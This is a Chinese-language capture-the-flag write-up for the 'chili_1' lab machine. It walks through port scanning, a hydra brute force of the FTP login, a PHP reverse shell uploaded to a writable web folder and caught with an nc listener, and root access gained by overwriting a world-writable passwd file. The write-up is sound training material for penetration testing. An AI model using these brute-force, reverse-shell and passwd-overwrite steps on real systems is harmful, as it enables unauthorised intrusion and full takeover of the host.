chili_1 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ sudo nmap -sT -sV -sC -O -p21,80 192.1.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-06 07:54 EDT
Nmap scan report for 192.1.1.140
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Chili
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:B2:10:06 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds

开放了两个端口，ftp 的版本号搜索后发现只有拒绝服务漏洞

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ sudo nmap --script=vuln -p21,80 192.1.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-06 07:56 EDT
Nmap scan report for 192.1.1.140
Host is up (0.00026s latency).

PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
MAC Address: 00:0C:29:B2:10:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 37.47 seconds

这里漏洞脚本没有任何结果，这里大概率不存在匿名登录 ftp 的情况

┌──(kali㉿kali)-[~/tools]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.140  
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 09:25 EDT
Nmap scan report for 192.1.1.140
Host is up (0.00038s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:B2:10:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 27.90 seconds

目录爆破

UDP 端口也没开，那就看看 web 端，同时进行目录爆破吧

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.1.1.140/     
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.140/-_23-08-06_08-03-24.txt

Error Log: /root/.dirsearch/logs/errors-23-08-06_08-03-24.log

Target: http://192.1.1.140/

[08:03:24] Starting: 
[08:03:25] 403 -  276B  - /.ht_wsr.txt                                     
[08:03:25] 403 -  276B  - /.htaccess.bak1                                  
[08:03:25] 403 -  276B  - /.htaccess_extra
[08:03:25] 403 -  276B  - /.htaccess.sample
[08:03:25] 403 -  276B  - /.htaccess_orig
[08:03:25] 403 -  276B  - /.htaccess.orig
[08:03:25] 403 -  276B  - /.htaccessOLD2
[08:03:25] 403 -  276B  - /.htaccess.save
[08:03:25] 403 -  276B  - /.htaccess_sc
[08:03:25] 403 -  276B  - /.htaccessOLD
[08:03:25] 403 -  276B  - /.html
[08:03:25] 403 -  276B  - /.htaccessBAK                                    
[08:03:25] 403 -  276B  - /.htm
[08:03:25] 403 -  276B  - /.htpasswds
[08:03:25] 403 -  276B  - /.htpasswd_test
[08:03:25] 403 -  276B  - /.httr-oauth
[08:03:26] 403 -  276B  - /.php                                            
[08:03:26] 200 -  736B  - /.vim/                                            
[08:03:41] 200 -  657B  - /index.html                                       
[08:03:49] 403 -  276B  - /server-status                                    
[08:03:49] 403 -  276B  - /server-status/                                   
                                                                             
Task Completed

发现了/.vim 目录，浏览器端进去之后发现没有文件，通过 nikto 扫描了一下，并没有文件上传的 PUT 方法。

浏览器访问 80 端口的默认界面只有一张图片，看看源码吧

有一些信息，查了查资料发现，这里的 meta 是给爬虫看的，看来看去，感觉只有 chili 或者 chile，以及 Chile_Web.jpg 有价值

又换了个目录爆破工具试了试，确实没得到特别有价值的信息。那么 80 端口的渗透攻击路径就卡住

判断是否图片隐写

接下来我尝试了对 Chile_Web.jpg 进行信息隐藏的发现，使用了 exiftool, file, binwalk, strings, stegcracker, 010 editor, stegsolve 进行查看，但均无收获，这个过程中 chatgpt 起到的辅助作用很大，帮助我迅速了解一些字段的含义，快速判断是否存在信息隐藏

ftp 爆破

那就只能尝试对 ftp 进行爆破了，一开始爆破了五分钟没成功，以为这条攻击路径不对，又去纠结目录结构和图片隐藏信息了，后面实在没思路，看了眼 WP，发现这次爆破要等的时间比较长，大约 15min 左右。怎么说呢，确实需要改进自己原本的想法，对于爆破还是要爆破到结束才行

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ hydra -l chili -P /usr/share/wordlists/rockyou.txt 192.1.1.140 ftp -t 32
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-09 17:06:58
[DATA] max 32 tasks per 1 server, overall 32 tasks, 14344399 login tries (l:1/p:14344399), ~448263 tries per task
[DATA] attacking ftp://192.1.1.140:21/
[STATUS] 576.00 tries/min, 576 tries in 00:01h, 14343823 to do in 415:03h, 32 active
[STATUS] 590.33 tries/min, 1771 tries in 00:03h, 14342628 to do in 404:56h, 32 active
[STATUS] 574.43 tries/min, 4021 tries in 00:07h, 14340378 to do in 416:05h, 32 active
[21][ftp] host: 192.1.1.140   login: chili   password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-09 17:14:47

修改了线程数为 32，将 15 分钟的爆破压缩成了 7 分钟+

利用这个口令登录到 ftp 上，翻看网站目录和用户家目录

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ ftp 192.1.1.140
Connected to 192.1.1.140.
220 (vsFTPd 3.0.3)
Name (192.1.1.140:kali): chili
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||57740|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alih
229 Entering Extended Passive Mode (|||48639|)
150 Here comes the directory listing.
drwxr-xr-x    3 1000     1000         4096 Sep 08  2020 .
drwxr-xr-x    3 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000          220 Sep 07  2020 .bash_logout
-rw-r--r--    1 1000     1000         3526 Sep 07  2020 .bashrc
drwxr-xr-x    3 1000     1000         4096 Sep 08  2020 .local
-rw-r--r--    1 1000     1000          807 Sep 07  2020 .profile
226 Directory send OK.
ftp> pwd
Remote directory: /home/chili

ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls -alih
229 Entering Extended Passive Mode (|||37526|)
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 Sep 08  2020 .
drwxr-xr-x    3 0        0            4096 Sep 08  2020 ..
drwxrwxrwx    2 0        0            4096 Sep 08  2020 .nano
drwxr-xr-x    2 0        0            4096 Sep 08  2020 .vim
-rw-r--r--    1 0        0           74290 Oct 23  2018 Chile_WEB.jpg
-rw-r--r--    1 0    

网站目录反弹 shell

发现了一个目录爆破中没有拿到的文件夹 .nano，而且这个文件夹是完全可控的，尝试将 php 反弹 shell 的代码上传上去

ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||13435|)
150 Ok to send data.
100% |***********************************************************************|  5493       45.55 MiB/s    00:00 ETA
226 Transfer complete.
5493 bytes sent in 00:00 (9.75 MiB/s)
ftp> ls -liah
229 Entering Extended Passive Mode (|||45190|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Aug 09 17:22 .
drwxr-xr-x    4 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000            0 Sep 08  2020 index.html
-rw-------    1 1000     1000         5493 Aug 09 17:22 php-reverse-shell.php
226 Directory send OK.

上传上去的文件访问有问题，看起来似乎是文件权限的问题，上传的文件默认是 600 权限，网站 www-data 用户不可读。这里我一开始没想到 ftp 还有 chmod 命令，原本是想把 index.html 给写入反弹 shell 的内容，但是 html 解析的优先级似乎更高，访问得到了如图所示的结果

使用 ? 看自己能使用哪些命令的时候发现竟然可以使用 chmod ，我直接就是一个 chmod 777 php.php

然后提前开启监听，浏览器访问 192.1.1.140/.nano/php.php，反弹 shell 成功

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.140] 52810
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 17:43:27 up  2:06,  0 users,  load average: 0.05, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@chili:/$

passwd 文件可写提权

接下来就是提权的过程了，这里需要说明的是，我是在 ftp 翻看文件系统的时候，发现了 passwd 文件存在其他用户可读可写的情况，所以利用 openssl passwd passwd123 生成了密码的哈希，并利用 ftp 上传覆盖掉了原本的 passwd 文件。正常的情况下应该是先检查 sudo -l 权限，同时确认立足点是否正确，再检查敏感文件的权限和 SUID 文件。

www-data@chili:/$ sudo -l
bash: sudo: command not found
www-data@chili:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@chili:/$ uname -a
uname -a
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
www-data@chili:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b2:10:06 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.140/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1591sec preferred_lft 1591sec
    inet6 fe80::20c:29ff:feb2:1006/64 scope link 
       valid_lft forever preferred_lft forever

最后就简单记录下自己打靶时的操作，上面已经做了解释

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ openssl passwd passwd123 
$1$r5F9tOKO$3.v/LZvYOq7B990Nj1ie11

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ vim passwd

# ftp上的操作
ftp> get passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||61081|)
150 Opening BINARY mode data connection for passwd (1450 bytes).
100% |***********************************************************************|  1450       26.09 MiB/s    00:00 ETA
226 Transfer complete.
1450 bytes received in 00:00 (566.40 KiB/s)
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||60464|)
150 Ok to send data.
100% |***********************************************************************|  1483       15.89 MiB/s    00:00 ETA
226 Transfer complete.
1483 bytes sent in 00:00 (2.76 MiB/s)

最后的最后直接 su - 使用 passwd123 直接切换为 root 用户即可

www-data@chili:/$ su -
su -
Password: passwd123

root@chili:~# cd /root
cd /root
root@chili:~# ls -liah
ls -liah
total 32K
2097153 drwx------  3 root root 4.0K Sep  8  2020 .
      2 drwxr-xr-x 18 root root 4.0K Sep  7  2020 ..
2097156 -rw-------  1 root root  126 Sep  8  2020 .bash_history
2097155 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
2097158 drwxr-xr-x  3 root root 4.0K Sep  8  2020 .local
2097154 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
2097163 -rw-r--r--  1 root root   47 Sep  8  2020 proof.txt
2097157 -rw-r--r--  1 root root  176 Sep  8  2020 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b